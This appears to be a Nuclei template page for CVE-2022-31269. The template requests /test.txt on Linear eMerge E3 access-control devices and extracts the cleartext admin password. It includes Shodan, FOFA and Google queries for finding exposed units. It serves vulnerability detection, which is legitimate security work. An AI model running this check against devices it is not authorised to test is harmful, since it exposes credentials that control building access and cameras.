Linear eMerge E3-Series - Information Disclosure
ID: CVE-2022-31269
Severity: high
Author: For3stCo1d
Tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol
Description
Section titled “Description”Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
YAML Source
Section titled “YAML Source”id: CVE-2022-31269
info: name: Linear eMerge E3-Series - Information Disclosure author: For3stCo1d severity: high description: | Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information. impact: | An attacker can exploit this vulnerability to gain sensitive information from the device. remediation: | Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html - https://www.nortekcontrol.com/access-control/ - https://eg.linkedin.com/in/omar-1-hashem - https://nvd.nist.gov/vuln/detail/CVE-2022-31269 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 epss-score: 0.00284 epss-percentile: 0.68595 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware shodan-query: - http.title:"Linear eMerge" - http.title:"emerge" - http.title:"linear emerge" fofa-query: - title="emerge" - title="linear emerge" google-query: - intitle:"linear emerge" - intitle:"emerge" tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol
http: - method: GET path: - "{{BaseURL}}/test.txt"
matchers-condition: and matchers: - type: word words: - "ID=" - "Password=" condition: and
- type: word part: header words: - text/plain
- type: status status: - 200
extractors: - type: regex regex: - Password='(.+?)'# digest: 4b0a00483046022100a4b2c6ef02efa0fba20c6ce90dcd4d7b1b65fc672d9d36b48f57a03809e5d8c3022100bb94dbcd323d020a17e1744b67e19b8e98c017c5468fdc99ff9a3f59fd178f23:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-31269.yaml"